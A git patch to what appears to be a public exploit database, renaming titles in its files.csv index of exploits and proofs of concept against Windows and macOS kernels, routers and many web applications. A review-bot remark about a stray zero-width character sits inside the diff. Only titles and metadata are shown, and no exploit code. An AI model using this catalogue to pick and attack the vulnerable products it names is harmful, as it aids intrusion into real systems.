From 5bd93d7e45df44524d058c649d7aaab5bca6b29d Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 25 Oct 2017 05:01:35 +0000 Subject: [PATCH] DB: 2017-10-25 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 12 new exploits Apple Mac OSX xnu 1228.0 - mach-o Local Kernel Denial of Service (PoC) Apple Mac OSX xnu 1228.0 - 'mach-o' Local Kernel Denial of Service (PoC) Apple Mac OSX xnu 1228.0 - super_blob Local kernel Denial of Service (PoC) Apple Mac OSX xnu 1228.0 - 'super_blob' Local kernel Denial of Service (PoC) Administrador de Contenidos - Admin Login Bypass Administrador de Contenidos - Admin Authentication Bypass Microsoft Windows Kernel - DeferWindowPos Use-After-Free (MS15-073) Microsoft Windows Kernel - UserCommitDesktopMemory Use-After-Free (MS15-073) Microsoft Windows Kernel - 'DeferWindowPos' Use-After-Free (MS15-073) Microsoft Windows Kernel - 'UserCommitDesktopMemory' Use-After-Free (MS15-073) Microsoft Windows Kernel - HmgAllocateObjectAttr Use-After-Free (MS15-061) Microsoft Windows Kernel - win32k!vSolidFillRect Buffer Overflow (MS15-061) Microsoft Windows Kernel - SURFOBJ Null Pointer Dereference (MS15-061) Microsoft Windows Kernel - 'HmgAllocateObjectAttr' Use-After-Free (MS15-061) Microsoft Windows Kernel - 'win32k!vSolidFillRect' Buffer Overflow (MS15-061) Microsoft Windows Kernel - 'SURFOBJ' Null Pointer Dereference (MS15-061) Microsoft Windows Kernel - FlashWindowEx​ Memory Corruption (MS15-097) Microsoft Windows Kernel - bGetRealizedBrush Use-After-Free (MS15-097) Microsoft Windows Kernel - 'FlashWindowEx​' Memory Corruption (MS15-097) Microsoft Windows Kernel - 'bGetRealizedBrush' Use-After-Free (MS15-097) Microsoft Windows Kernel - NtGdiStretchBlt Pool Buffer Overflows (MS15-097) Microsoft Windows Kernel - 'NtGdiStretchBlt' Pool Buffer Overflows (MS15-097) Microsoft Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097) Microsoft Windows Kernel - 'NtGdiBitBlt' Buffer Overflow (MS15-097) Blue Coat ProxySG 5.x - and Security Gateway OS Denial of Service Blue Coat 
ProxySG 5.x and Security Gateway OS - Denial of Service Microsoft Windows Kernel - win32k!OffsetChildren Null Pointer Dereference Microsoft Windows Kernel - 'win32k!OffsetChildren' Null Pointer Dereference Apple Mac OSX - IOBluetoothHCIUserClient Arbitrary Kernel Code Execution Apple Mac OSX - 'IOBluetoothHCIUserClient' Arbitrary Kernel Code Execution Apple Mac OSX - gst_configure Kernel Buffer Overflow Apple Mac OSX - IntelAccelerator::gstqConfigure Exploitable Kernel NULL Dereference Apple Mac OSX - 'gst_configure' Kernel Buffer Overflow Apple Mac OSX - 'IntelAccelerator::gstqConfigure' Exploitable Kernel NULL Dereference Microsoft Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read Microsoft Windows Kernel - 'NtGdiGetTextExtentExW'' Out-of-Bounds Memory Read Microsoft Windows Kernel - win32k Denial of Service (MS16-135) Microsoft Windows Kernel - 'win32k' Denial of Service (MS16-135) Microsoft Windows 10 Kernel - nt!NtTraceControl (EtwpSetProviderTraits) Pool Memory Disclosure Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure Microsoft Windows Kernel - win32k.sys '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath) Microsoft Windows Kernel - win32k.sys .TTF Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow) Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath) Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow) AIX 5.2 - netpmon Local Elevated Privileges Exploit AIX 5.2 - ipl_varyon Local Elevated Privileges Exploit AIX 5.2 - 'netpmon' Local Privilege Escalation AIX 5.2 - 'ipl_varyon' Local Privilege Escalation Willing Webcam 2.8 - Licence Info Disclosure Local Exploit Willing Webcam 2.8 - Licence Information Disclosure Local Exploit Solaris 7.0 cancel 
- Exploit Solaris 7.0 chkperm - Exploit Solaris 7.0 - 'cancel' Exploit Solaris 7.0 - 'chkperm' Exploit Apple Mac OSX 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption Apple Mac OSX 10.4.x - 'Shared_Region_Make_Private_Np' Kernel Function Local Memory Corruption Apple macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free Mikogo 5.4.1.160608 - Local Credentials Disclosure THOMSON ST585 - 'user.ini' Arbitrary Download THOMSON ST585 - 'user.ini' Arbitrary Disclosure THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Download THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Disclosure Adobe Flash and Reader - Live Malware (PoC) Adobe Flash / Reader - Live Malware (PoC) Unify eWave ServletExec 3 - JSP Source Disclosure Unify eWave ServletExec 3 - .JSP Source Disclosure 1C: Arcadia Internet Store 1.0 - Show Path 1C: Arcadia Internet Store 1.0 - Path Disclosure Adobe ColdFusion 9 - Administrative Login Bypass (Metasploit) Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit) Apache Tomcat 6.0.13 - Cookie Handling Quote Delimiter Session ID Disclosure Apache Tomcat 6.0.13 - Insecure Cookie Handling Quote Delimiter Session ID Disclosure myNewsletter 1.1.2 - 'adminLogin.asp' Login Bypass myNewsletter 1.1.2 - 'adminLogin.asp' Authentication Bypass 2BGal 3.0 - '/admin/configuration.inc.php' Local Inclusion Exploit 2BGal 3.0 - '/admin/configuration.inc.php' Local File Inclusion Estate Agent Manager 1.3 - 'default.asp' Login Bypass Property Pro 1.0 - 'vir_Login.asp' Remote Login Bypass Estate Agent Manager 1.3 - 'default.asp' Authentication Bypass Property Pro 1.0 - 'vir_Login.asp' Remote Authentication Bypass Hpecs Shopping Cart - Remote Login Bypass Hpecs Shopping Cart - Remote Authentication Bypass HR Assist 1.05 - 'vdateUsr.asp' Remote Login Bypass HR Assist 
1.05 - 'vdateUsr.asp' Remote Authentication Bypass PHPX 3.5.16 - Cookie Poisoning / Login Bypass PHPX 3.5.16 - Cookie Poisoning / Authentication Bypass Absolute File Send 1.0 - Remote Cookie Handling Absolute File Send 1.0 - Remote Insecure Cookie Handling Absolute Poll Manager XE 4.1 - Cookie Handling Absolute Poll Manager XE 4.1 - Insecure Cookie Handling TR News 2.1 - 'login.php' Remote Login Bypass TR News 2.1 - 'login.php' Remote Authentication Bypass PhpAddEdit 1.3 - 'cookie' Login Bypass PhpAddEdit 1.3 - 'cookie' Authentication Bypass 2532/Gigs 1.2.2 Stable - Remote Login Bypass 2532/Gigs 1.2.2 Stable - Remote Authentication Bypass Flexcustomer 0.0.6 - Admin Login Bypass / Possible PHP code writing Flexcustomer 0.0.6 - Admin Authentication Bypass / Possible PHP code writing ClearBudget 0.6.1 - Insecure Database Download ClearBudget 0.6.1 - Insecure Database Disclosure ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities ClanTiger < 1.1.1 - Multiple Insecure Cookie Handling Vulnerabilities 2DayBiz Custom T-shirt Design -(SQL Injection / Cross-Site Scripting 2DayBiz Custom T-shirt Design - SQL Injection / Cross-Site Scripting ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Info Disclosure Vulnerabilities ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Information Disclosure Vulnerabilities Amiro.CMS 5.4.0.0 - Folder Disclosure Amiro.CMS 5.4.0.0 - Path Disclosure Mura CMS 5.1 - Root Folder Disclosure Mura CMS 5.1 - Root Path Disclosure jgbbs-3.0beta1 - Database Download PSnews - Database Download jgbbs-3.0beta1 - Database Disclosure PSnews - Database Disclosure AspBB - Active Server Page Bulletin Board Database Download Futility Forum 1.0 Revamp - Database Download htmlArea 2.03 - Database Download Uguestbook - Database Download BaalASP 2.0 - Database Download Fully Functional ASP Forum 1.0 - Database Download makit news/blog poster 3.1 - Database Download AspBB - Active Server Page Bulletin Board Database Disclosure Futility Forum 1.0 Revamp - Database 
Disclosure htmlArea 2.03 - Database Disclosure Uguestbook - Database Disclosure BaalASP 2.0 - Database Disclosure Fully Functional ASP Forum 1.0 - Database Disclosure makit news/blog poster 3.1 - Database Disclosure ASP Battle Blog - Database Download ASP Battle Blog - Database Disclosure Proxyroll.com Clone PHP Script - Cookie Handling Proxyroll.com Clone PHP Script - Insecure Cookie Handling YP Portal MS-Pro Surumu 1.0 - Database Download YP Portal MS-Pro Surumu 1.0 - Database Disclosure Lebi soft Ziyaretci Defteri 7.5 - Database Download Net Gitar Shop 1.0 - Database Download Lebi soft Ziyaretci Defteri 7.5 - Database Disclosure Net Gitar Shop 1.0 - Database Disclosure VP-ASP Shopping Cart 7.0 - Database Download VP-ASP Shopping Cart 7.0 - Database Disclosure Asp VevoCart Control System 3.0.4 - Database Download Asp VevoCart Control System 3.0.4 - Database Disclosure MoME CMS 0.8.5 - Remote Login Bypass RoseOnlineCMS 3 B1 - Remote Login Bypass MoME CMS 0.8.5 - Remote Authentication Bypass RoseOnlineCMS 3 B1 - Remote Authentication Bypass al3jeb script - Remote Login Bypass al3jeb script - Remote Authentication Bypass Al Sat Scripti - Database Download Al Sat Scripti - Database Disclosure Mp3 MuZik - DataBase Download Mp3 MuZik - Database Disclosure My School Script - Data Base Download My School Script - Database Disclosure Azimut Technologie - Admin Login Bypass Azimut Technologie - Admin Authentication Bypass Auction_Software Script - Admin Login Bypass Auction_Software Script - Admin Authentication Bypass BSI Hotel Booking System Admin 1.4/2.0 - Login Bypass BSI Hotel Booking System Admin 1.4/2.0 - Authentication Bypass DeluxeBB 1.3 - Private Info Disclosure DeluxeBB 1.3 - Private Information Disclosure Qcodo Development Framework 0.3.3 - Full Info Disclosure Qcodo Development Framework 0.3.3 - Full Information Disclosure CosmoQuest - Login Bypass CosmoQuest - Authentication Bypass PHProjekt 2.x/3.x - Login Bypass PHProjekt 2.x/3.x - Authentication Bypass 
MapInfo Discovery 1.0/1.1 - Administrative Login Bypass MapInfo Discovery 1.0/1.1 - Administrative Authentication Bypass Keyvan1 ImageGallery - Database Download Keyvan1 ImageGallery - Database Disclosure Simple File Manager 024 - Login Bypass Simple File Manager 024 - Authentication Bypass Adobe ColdFusion 9 - Administrative Login Bypass Adobe ColdFusion 9 - Administrative Authentication Bypass RASPcalendar 1.01 - [ASP] Admin Login RASPcalendar 1.01 (ASP) - Admin Login Zend-Framework - Full Info Disclosure Zend-Framework - Full Information Disclosure Simple E-document 1.31 - Login Bypass Simple E-document 1.31 - Authentication Bypass ZYXEL P-660HN-T1A Router - Login Bypass ZYXEL P-660HN-T1A Router - Authentication Bypass agXchange ESM - 'ucschcancelproc.jsp' Open redirection agXchange ESM - 'ucschcancelproc.jsp' Open Redirection ESRI ArcGIS for Server - 'where' Form Field SQL Injection ESRI ArcGIS for Server - 'where' Form SQL Injection ZTE ZXHN H108N Router - Unauthenticated Config Download ZTE ZXHN H108N Router - Unauthenticated Config Disclosure FS Car Rental Script - 'pickup_location' SQL Injection FS Amazon Clone - 'category_id' SQL Injection FS Book Store Script - 'category' SQL Injection FS Ebay Clone - 'pd_maincat_id' SQL Injection FS Food Delivery Script - 'keywords' SQL Injection FS Expedia Clone - 'hid' SQL Injection FS Freelancer Clone - 'sk' SQL Injection FS Groupon Clone - 'category' SQL Injection FS Indiamart Clone - 'keywords' SQL Injection FS Lynda Clone - 'category' SQL Injection FS OLX Clone - 'catg_id' SQL Injection --- files.csv | 202 ++++++++++++++++--------------- platforms/php/webapps/43034.txt | 45 +++++++ platforms/php/webapps/43035.txt | 45 +++++++ platforms/php/webapps/43036.txt | 37 ++++++ platforms/php/webapps/43037.txt | 41 +++++++ platforms/php/webapps/43038.txt | 41 +++++++ platforms/php/webapps/43039.txt | 44 +++++++ platforms/php/webapps/43040.txt | 40 ++++++ platforms/php/webapps/43041.txt | 40 ++++++ 
platforms/php/webapps/43042.txt | 36 ++++++ platforms/php/webapps/43043.txt | 39 ++++++ platforms/php/webapps/43044.txt | 37 ++++++ platforms/windows/local/43033.py | 103 ++++++++++++++++ 13 files changed, 655 insertions(+), 95 deletions(-) create mode 100755 platforms/php/webapps/43034.txt create mode 100755 platforms/php/webapps/43035.txt create mode 100755 platforms/php/webapps/43036.txt create mode 100755 platforms/php/webapps/43037.txt create mode 100755 platforms/php/webapps/43038.txt create mode 100755 platforms/php/webapps/43039.txt create mode 100755 platforms/php/webapps/43040.txt create mode 100755 platforms/php/webapps/43041.txt create mode 100755 platforms/php/webapps/43042.txt create mode 100755 platforms/php/webapps/43043.txt create mode 100755 platforms/php/webapps/43044.txt create mode 100755 platforms/windows/local/43033.py diff --git a/files.csv b/files.csv index 8cec67b1b..a27336e77 100644 --- a/files.csv +++ b/files.csv 
@@ -662,12 +662,12 @@ id,file,description,date,author,platform,type,port
 4682,platforms/windows/dos/4682.c,"Microsoft Windows Media Player - '.AIFF' Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0
 4683,platforms/windows/dos/4683.py,"RealPlayer 11 - '.au' Denial of Service",2007-12-01,NtWaK0,windows,dos,0
 4688,platforms/windows/dos/4688.html,"VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization",2007-12-04,"Ricardo Narvaja",windows,dos,0
-4689,platforms/osx/dos/4689.c,"Apple Mac OSX xnu 1228.0 - mach-o Local Kernel Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0
+4689,platforms/osx/dos/4689.c,"Apple Mac OSX xnu 1228.0 - 'mach-o' Local Kernel Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0
 4690,platforms/osx/dos/4690.c,"Apple Mac OSX 10.5.0 (Leopard) - vpnd Remote Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0
 4692,platforms/hardware/dos/4692.pl,"Cisco Phone 7940 - Remote Denial of Service",2007-12-05,MADYNES,hardware,dos,0
 4716,platforms/windows/dos/4716.html,"Online Media Technologies 'AVSMJPEGFILE.DLL 1.1' - Remote Buffer Overflow (PoC)",2007-12-11,shinnai,windows,dos,0
 4717,platforms/windows/dos/4717.py,"Simple HTTPD 1.41 - '/aux' Remote Denial of Service",2007-12-11,shinnai,windows,dos,0
-4723,platforms/osx/dos/4723.c,"Apple Mac OSX xnu 1228.0 - super_blob Local kernel Denial of Service (PoC)",2007-12-12,mu-b,osx,dos,0
+4723,platforms/osx/dos/4723.c,"Apple Mac OSX xnu 1228.0 - 'super_blob' Local kernel Denial of Service (PoC)",2007-12-12,mu-b,osx,dos,0
 4732,platforms/linux/dos/4732.c,"Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow",2007-12-14,x86,linux,dos,0
 4742,platforms/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow (PoC)",2007-12-18,r4x,windows,dos,0
 4748,platforms/windows/dos/4748.php,"Surgemail 38k4 - webmail Host header Denial of Service",2007-12-18,rgod,windows,dos,0
@@ -1535,7 +1535,7 @@ id,file,description,date,author,platform,type,port
 12509,platforms/osx/dos/12509.html,"Multiple Browsers - 'window.print()' Denial of Service",2010-05-04,Dr_IDE,osx,dos,0
 12518,platforms/windows/dos/12518.pl,"Microsoft Paint - Integer Overflow (Denial of Service) (MS10-005)",2010-05-06,unsign,windows,dos,0
 12524,platforms/windows/dos/12524.py,"Microsoft Windows - SMB2 Negotiate Protocol (0x72) Response Denial of Service",2010-05-07,"Jelmer de Hen",windows,dos,0
-12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Login Bypass",2010-05-07,Ra3cH,asp,dos,0
+12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Authentication Bypass",2010-05-07,Ra3cH,asp,dos,0
 12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x86/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",windows,dos,0
 12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow Denial of Service (Metasploit)",2010-05-08,"Jeremiah Talamantes",windows,dos,0
 12531,platforms/windows/dos/12531.pl,"GeoHttpServer - Remote Denial of Service",2010-05-08,aviho1,windows,dos,0
@@ -4747,21 +4747,21 @@ id,file,description,date,author,platform,type,port
 38263,platforms/osx/dos/38263.txt,"Apple Mac OSX Regex Engine (TRE) - Stack Buffer Overflow",2015-09-22,"Google Security Research",osx,dos,0
 38264,platforms/osx/dos/38264.txt,"Apple qlmanage - SceneKit::daeElement::setElementName Heap Overflow",2015-09-22,"Google Security Research",osx,dos,0
 38265,platforms/win_x86/dos/38265.txt,"Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)",2015-09-22,"Nils Sommer",win_x86,dos,0
-38266,platforms/win_x86/dos/38266.txt,"Microsoft Windows Kernel - DeferWindowPos Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos,0
-38267,platforms/win_x86/dos/38267.txt,"Microsoft Windows Kernel - UserCommitDesktopMemory Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos,0
+38266,platforms/win_x86/dos/38266.txt,"Microsoft Windows Kernel - 'DeferWindowPos' Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos,0
+38267,platforms/win_x86/dos/38267.txt,"Microsoft Windows Kernel - 'UserCommitDesktopMemory' Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos,0
 38268,platforms/win_x86/dos/38268.txt,"Microsoft Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0
-38269,platforms/win_x86/dos/38269.txt,"Microsoft Windows Kernel - HmgAllocateObjectAttr Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0
-38270,platforms/win_x86/dos/38270.txt,"Microsoft Windows Kernel - win32k!vSolidFillRect Buffer Overflow (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0
-38271,platforms/win_x86/dos/38271.txt,"Microsoft Windows Kernel - SURFOBJ Null Pointer Dereference (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0
+38269,platforms/win_x86/dos/38269.txt,"Microsoft Windows Kernel - 'HmgAllocateObjectAttr' Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0
+38270,platforms/win_x86/dos/38270.txt,"Microsoft Windows Kernel - 'win32k!vSolidFillRect' Buffer Overflow (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0
+38271,platforms/win_x86/dos/38271.txt,"Microsoft Windows Kernel - 'SURFOBJ' Null Pointer Dereference (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0
 38272,platforms/windows/dos/38272.txt,"Microsoft Windows Kernel - Brush Object Use-After-Free (MS15-061)",2015-09-22,"Google Security Research",windows,dos,0
 38273,platforms/win_x86/dos/38273.txt,"Microsoft Windows Kernel - WindowStation Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0
 38274,platforms/win_x86/dos/38274.txt,"Microsoft Windows Kernel - Null Pointer Dereference with Window Station and Clipboard (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0
 38275,platforms/win_x86/dos/38275.txt,"Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)",2015-09-22,"Nils Sommer",win_x86,dos,0
-38276,platforms/win_x86/dos/38276.txt,"Microsoft Windows Kernel - FlashWindowEx​ Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0
-38277,platforms/win_x86/dos/38277.txt,"Microsoft Windows Kernel - bGetRealizedBrush Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0
+38276,platforms/win_x86/dos/38276.txt,"Microsoft Windows Kernel - 'FlashWindowEx​' Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0
+38277,platforms/win_x86/dos/38277.txt,"Microsoft Windows Kernel - 'bGetRealizedBrush' Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0
 38278,platforms/win_x86/dos/38278.txt,"Microsoft Windows Kernel - Use-After-Free with Cursor Object (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0
 38279,platforms/win_x86/dos/38279.txt,"Microsoft Windows Kernel - Use-After-Free with Printer Device Contexts (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0
-38280,platforms/win_x86/dos/38280.txt,"Microsoft Windows Kernel - NtGdiStretchBlt Pool Buffer Overflows (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0
+38280,platforms/win_x86/dos/38280.txt,"Microsoft Windows Kernel - 'NtGdiStretchBlt' Pool Buffer Overflows (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0
 38281,platforms/windows/dos/38281.txt,"Kaspersky AntiVirus - VB6 Parsing Integer Overflow",2015-09-22,"Google Security Research",windows,dos,0
 38282,platforms/windows/dos/38282.txt,"Kaspersky AntiVirus - ExeCryptor Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0
 38283,platforms/windows/dos/38283.txt,"Kaspersky AntiVirus - PE Unpacking Integer Overflow",2015-09-22,"Google Security Research",windows,dos,0
@@ -4769,7 +4769,7 @@ id,file,description,date,author,platform,type,port
 38285,platforms/windows/dos/38285.txt,"Kaspersky AntiVirus - CHM Parsing Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,dos,0
 38286,platforms/windows/dos/38286.txt,"Kaspersky AntiVirus - UPX Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0
 38288,platforms/windows/dos/38288.txt,"Kaspersky AntiVirus - Yoda's Protector Unpacking Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0
-38307,platforms/win_x86/dos/38307.txt,"Microsoft Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",win_x86,dos,0
+38307,platforms/win_x86/dos/38307.txt,"Microsoft Windows Kernel - 'NtGdiBitBlt' Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",win_x86,dos,0
 38317,platforms/windows/dos/38317.txt,"FreshFTP 5.52 - '.qfl' Crash (PoC)",2015-09-25,Un_N0n,windows,dos,0
 38336,platforms/windows/dos/38336.py,"Git 1.9.5 - 'ssh-agent.exe' Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0
 38337,platforms/ios/dos/38337.txt,"Telegram 3.2 - Input Length Handling Crash (PoC)",2015-09-28,"Mohammad Reza Espargham",ios,dos,0
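Review bot: The re-quoted title on the `+38276` row appears to keep an invisible character between `FlashWindowEx` and the closing quote; it looks like a zero-width space carried over unchanged from the removed row. With it in place the quoted identifier will not match a plain-text search for the function name, so anyone mapping this index to advisories or detection content by title can miss the entry. Since the row is being rewritten anyway, strip the character so the title reads `'FlashWindowEx' Memory Corruption (MS15-097)`.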
@@ -4842,7 +4842,7 @@ id,file,description,date,author,platform,type,port
 38761,platforms/windows/dos/38761.py,"Sam Spade 1.14 - Decode URL Buffer Overflow Crash (PoC)",2015-11-19,"Vivek Mahajan",windows,dos,0
 38763,platforms/lin_x86/dos/38763.txt,"Google Chrome - open-vcdiff Out-of-Bounds Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0
 38771,platforms/windows/dos/38771.py,"ShareKM - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0
-38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x - and Security Gateway OS Denial of Service",2013-09-23,anonymous,linux,dos,0
+38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x and Security Gateway OS - Denial of Service",2013-09-23,anonymous,linux,dos,0
 38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server - Remote Denial of Service",2013-09-30,"Zico Ekel",multiple,dos,0
 38787,platforms/windows/dos/38787.txt,"Acrobat Reader DC 15.008.20082.15957 - '.PDF' Parsing Memory Corruption",2015-11-23,"Francis Provencher",windows,dos,0
 38788,platforms/windows/dos/38788.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (1)",2015-11-23,"Francis Provencher",windows,dos,0
@@ -4895,7 +4895,7 @@ id,file,description,date,author,platform,type,port
 39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
 40105,platforms/multiple/dos/40105.txt,"Adobe Flash Player 22.0.0.192 - TAG Memory Corruption",2016-07-13,COSIG,multiple,dos,0
 40104,platforms/multiple/dos/40104.txt,"Adobe Flash Player 22.0.0.192 - SceneAndFrameData Memory Corruption",2016-07-13,COSIG,multiple,dos,0
-39025,platforms/windows/dos/39025.txt,"Microsoft Windows Kernel - win32k!OffsetChildren Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0
+39025,platforms/windows/dos/39025.txt,"Microsoft Windows Kernel - 'win32k!OffsetChildren' Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0
 39026,platforms/win_x86/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Dereference",2015-12-17,"Nils Sommer",win_x86,dos,0
 39027,platforms/win_x86/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free",2015-12-17,"Nils Sommer",win_x86,dos,0
 39037,platforms/windows/dos/39037.php,"Apache 2.4.17 - Denial of Service",2015-12-18,rUnViRuS,windows,dos,0
@@ -4953,7 +4953,7 @@ id,file,description,date,author,platform,type,port
 39233,platforms/windows/dos/39233.txt,"Microsoft Office / COM Object - 'WMALFXGFXDSP.dll' DLL Planting (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0
 39242,platforms/windows/dos/39242.py,"NetSchedScan 1.0 - Crash (PoC)",2016-01-15,"Abraham Espinosa",windows,dos,0
 39371,platforms/osx/dos/39371.c,"Apple Mac OSX - IOBluetoothHCIPacketLogUserClient Memory Corruption",2016-01-28,"Google Security Research",osx,dos,0
-39372,platforms/osx/dos/39372.c,"Apple Mac OSX - IOBluetoothHCIUserClient Arbitrary Kernel Code Execution",2016-01-28,"Google Security Research",osx,dos,0
+39372,platforms/osx/dos/39372.c,"Apple Mac OSX - 'IOBluetoothHCIUserClient' Arbitrary Kernel Code Execution",2016-01-28,"Google Security Research",osx,dos,0
 39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21
 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
 39305,platforms/freebsd/dos/39305.py,"FreeBSD SCTP ICMPv6 - Error Processing",2016-01-25,ptsecurity,freebsd,dos,0
@@ -4982,8 +4982,8 @@ id,file,description,date,author,platform,type,port
 39365,platforms/multiple/dos/39365.c,"Apple Mac OSX / iOS Kernel - IOHDIXControllUserClient::clientClose Use-After-Free/Double-Free",2016-01-28,"Google Security Research",multiple,dos,0
 39366,platforms/multiple/dos/39366.c,"Apple Mac OSX / iOS Kernel - iokit Registry Iterator Manipulation Double-Free",2016-01-28,"Google Security Research",multiple,dos,0
 39367,platforms/osx/dos/39367.c,"Apple Mac OSX - io_service_close Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0
-39368,platforms/osx/dos/39368.c,"Apple Mac OSX - gst_configure Kernel Buffer Overflow",2016-01-28,"Google Security Research",osx,dos,0
-39369,platforms/osx/dos/39369.c,"Apple Mac OSX - IntelAccelerator::gstqConfigure Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0
+39368,platforms/osx/dos/39368.c,"Apple Mac OSX - 'gst_configure' Kernel Buffer Overflow",2016-01-28,"Google Security Research",osx,dos,0
+39369,platforms/osx/dos/39369.c,"Apple Mac OSX - 'IntelAccelerator::gstqConfigure' Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0
 39370,platforms/osx/dos/39370.c,"Apple Mac OSX Kernel - Hypervisor Driver Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0
 39376,platforms/osx/dos/39376.c,"Apple Mac OSX - IOSCSIPeripheralDeviceType00 Userclient Type 12 Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0
 39377,platforms/multiple/dos/39377.c,"Apple Mac OSX / iOS - Unsandboxable Kernel Use-After-Free in Mach Vouchers",2016-01-28,"Google Security Research",multiple,dos,0
@@ -5091,7 +5091,7 @@ id,file,description,date,author,platform,type,port
 39638,platforms/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap Based Buffer Overflow",2016-03-30,"Stelios Tsampas",linux,dos,0
 39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0
 39647,platforms/windows/dos/39647.txt,"Microsoft Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0
-39648,platforms/windows/dos/39648.txt,"Microsoft Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0
